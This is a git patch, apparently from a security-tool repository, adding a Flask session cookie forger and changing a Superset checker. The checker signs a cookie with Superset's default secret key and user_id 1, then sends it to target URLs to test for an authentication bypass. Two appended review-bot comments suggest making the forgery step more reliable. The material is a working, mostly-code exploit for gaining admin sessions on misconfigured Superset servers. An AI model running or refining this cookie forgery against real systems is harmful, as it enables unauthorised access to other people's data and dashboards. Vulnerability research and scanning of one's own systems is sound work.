From 8437465f1be32fe7c643e9103688fc08729a823f Mon Sep 17 00:00:00 2001
From: OKAY_TC <50813688+Okaytc@users.noreply.github.com>
Date: Thu, 3 Aug 2023 16:53:19 +0800
Subject: [PATCH] Add files via upload
---
 flask_session_cookie_manager3.py | 159 +++++++++++++++++++++++++++++++
 superset_auth_bypass_check.py | 9 +-
 2 files changed, 166 insertions(+), 2 deletions(-)
 create mode 100644 flask_session_cookie_manager3.py
diff --git a/flask_session_cookie_manager3.py b/flask_session_cookie_manager3.py
new file mode 100644
index 0000000..c1ca800
--- /dev/null
+++ b/flask_session_cookie_manager3.py
@@ -0,0 +1,159 @@
+""" Flask Session Cookie Decoder/Encoder """
+__author__ = 'Wilson Sumanang, Alexandre ZANNI'
+
+# standard imports
+import sys
+import zlib
+from itsdangerous import base64_decode
+import ast
+
+# Abstract Base Classes (PEP 3119)
+if sys.version_info[0] < 3: # < 3.0
+    raise Exception('Must be using at least Python 3')
+elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
+    from abc import ABCMeta, abstractmethod
+else: # > 3.4
+    from abc import ABC, abstractmethod
+
+# Lib for argument parsing
+import argparse
+
+# external Imports
+from flask.sessions import SecureCookieSessionInterface
+
+class MockApp(object):
+
+    def __init__(self, secret_key):
+        self.secret_key = secret_key
+
+
+if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
+    class FSCM(metaclass=ABCMeta):
+        def encode(secret_key, session_cookie_structure):
+            """ Encode a Flask session cookie """
+            try:
+                app = MockApp(secret_key)
+
+                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
+                si = SecureCookieSessionInterface()
+                s = si.get_signing_serializer(app)
+
+                return s.dumps(session_cookie_structure)
+            except Exception as e:
+                return "[Encoding error] {}".format(e)
+                raise e
+
+
+        def decode(session_cookie_value, secret_key=None):
+            """ Decode a Flask cookie """
+            try:
+                if(secret_key==None):
+                    compressed = False
+                    payload = session_cookie_value
+
+                    if payload.startswith('.'):
+                        compressed = True
+                        payload = payload[1:]
+
+                    data = payload.split(".")[0]
+
+                    data = base64_decode(data)
+                    if compressed:
+                        data = zlib.decompress(data)
+
+                    return data
+                else:
+                    app = MockApp(secret_key)
+
+                    si = SecureCookieSessionInterface()
+                    s = si.get_signing_serializer(app)
+
+                    return s.loads(session_cookie_value)
+            except Exception as e:
+                return "[Decoding error] {}".format(e)
+                raise e
+else: # > 3.4
+    class FSCM(ABC):
+        def encode(secret_key, session_cookie_structure):
+            """ Encode a Flask session cookie """
+            try:
+                app = 
MockApp(secret_key)
+
+                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
+                si = SecureCookieSessionInterface()
+                s = si.get_signing_serializer(app)
+
+                return s.dumps(session_cookie_structure)
+            except Exception as e:
+                return "[Encoding error] {}".format(e)
+                raise e
+
+
+        def decode(session_cookie_value, secret_key=None):
+            """ Decode a Flask cookie """
+            try:
+                if(secret_key==None):
+                    compressed = False
+                    payload = session_cookie_value
+
+                    if payload.startswith('.'):
+                        compressed = True
+                        payload = payload[1:]
+
+                    data = payload.split(".")[0]
+
+                    data = base64_decode(data)
+                    if compressed:
+                        data = zlib.decompress(data)
+
+                    return data
+                else:
+                    app = MockApp(secret_key)
+
+                    si = SecureCookieSessionInterface()
+                    s = si.get_signing_serializer(app)
+
+                    return s.loads(session_cookie_value)
+            except Exception as e:
+                return "[Decoding error] {}".format(e)
+                raise e
+
+
+if __name__ == "__main__":
+    # Args are only relevant for __main__ usage
+
+    ## Description for help
+    parser = argparse.ArgumentParser(
+                    description='Flask Session Cookie Decoder/Encoder',
+                    epilog="Author : Wilson Sumanang, Alexandre ZANNI")
+
+    ## prepare sub commands
+    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
+
+    ## create the parser for the encode command
+    parser_encode = subparsers.add_parser('encode', help='encode')
+    parser_encode.add_argument('-s', '--secret-key', metavar='',
+                                help='Secret key', required=True)
+    parser_encode.add_argument('-t', '--cookie-structure', metavar='',
+                                help='Session cookie structure', required=True)
+
+    ## create the parser for the decode command
+    parser_decode = subparsers.add_parser('decode', help='decode')
+    parser_decode.add_argument('-s', '--secret-key', metavar='',
+                                help='Secret key', required=False)
+    parser_decode.add_argument('-c', '--cookie-value', metavar='',
+                                help='Session cookie value', required=True)
+
+    ## get args
+    args = parser.parse_args()
+
+    ## find the option chosen
+
if(args.subcommand == 'encode'):
+        if(args.secret_key is not None and args.cookie_structure is not None):
+            print(FSCM.encode(args.secret_key, args.cookie_structure))
+    elif(args.subcommand == 'decode'):
+        if(args.secret_key is not None and args.cookie_value is not None):
+            print(FSCM.decode(args.cookie_value,args.secret_key))
+        elif(args.cookie_value is not None):
+            print(FSCM.decode(args.cookie_value))
+
diff --git a/superset_auth_bypass_check.py b/superset_auth_bypass_check.py
index 9246e2c..a002f51 100644
--- a/superset_auth_bypass_check.py
+++ b/superset_auth_bypass_check.py
@@ -5,15 +5,20 @@ import requests
 import sys
 import re
 import threading
+import subprocess
 from requests.exceptions import RequestException
 from urllib3.exceptions import InsecureRequestWarning
+command = ['python3', 'flask_session_cookie_manager3.py', 'encode', '-s', 'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', '-t', "{'user_id': 1}"]
+session = subprocess.run(command, capture_output=True, text=True)
+sessionout = session.stdout.strip()
+
 # 自定义请求头字段
 headers = {
 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
 "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
-    "Cookie": "session=eyJ1c2VyX2lkIjoxfQ.ZEnvAw.psuAEJtVOeGlEgnJGqKLKSLE5WE"
+    "Cookie": "session="+sessionout
 }
 vulurl=[]
@@ -45,7 +50,7 @@ def urltest(url):
 #漏洞检测
 def vultest(url):
 try:
-        response = requests.get(url, headers=headers, verify=False , timeout=3)
+        response = requests.get(url, headers=headers, verify=False , timeout=3, allow_redirects=False)
 parsed_url = urlsplit(url)
 url=parsed_url.scheme+"://"+parsed_url.netloc
 # 检查响应头的状态码是否为200
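Review bot: The result of `subprocess.run` on the new `session = ...` line is never checked, so if the helper script cannot be started or fails, `sessionout` is empty or an error message and the `"Cookie": "session="+sessionout` header is sent as-is, silently turning every target into a not-affected result. A zero exit code is not sufficient either: the helper prints `[Encoding error] ...` to stdout on failure (its `except Exception` branch in the first file), so the output should be rejected when it is empty or starts with `[Encoding error]`. The helper is also located as `flask_session_cookie_manager3.py` relative to the current working directory and run with a bare `python3`, which breaks when the checker is launched from another directory or from a virtualenv where `python3` is not the interpreter that has Flask installed. Since both files live in the same repository, importing it avoids the subprocess entirely: `from flask_session_cookie_manager3 import FSCM` and `sessionout = FSCM.encode('CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', "{'user_id': 1}")`, followed by a `sys.exit(...)` with a clear message on the error cases, because this code runs at import time.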
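Review bot: The rewritten `requests.get` line carries over the stray space in `verify=False , timeout=3`; since the line is touched anyway, `response = requests.get(url, headers=headers, verify=False, timeout=3, allow_redirects=False)` is the cleaner form. Disabling redirects changes what the status check that follows sees: a redirect to the login page now arrives as a 3xx instead of the 200 of the page it led to, which is presumably the reason for the change and deserves a comment, e.g. `# allow_redirects=False: a redirect to the login page must not be counted as a 200`. `vultest`'s body, including the status-code check, continues past the end of the hunk.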